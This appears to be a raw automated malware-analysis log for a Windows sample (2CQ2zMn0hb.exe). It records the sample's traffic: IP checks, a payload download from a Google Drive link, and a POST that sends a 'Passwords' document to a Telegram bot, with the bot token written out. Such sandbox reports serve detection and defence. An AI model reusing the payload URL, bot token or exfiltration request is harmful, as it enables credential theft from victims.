            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49871 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318ef030315cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034CD1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034CD1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034CD1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348C1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348C1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/-
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/D
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/z
            Source: 2CQ2zMn0hb.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A5F000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.000000003499C000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034987000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgOC
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.0000000004428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.0000000004462000.00000004.00000020.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3286957419.0000000005DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2478153692.0000000004490000.00000004.00000020.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000448D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000447D000.00000004.00000020.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000447D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download)
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2478153692.0000000004490000.00000004.00000020.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000448D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/q
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
            Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
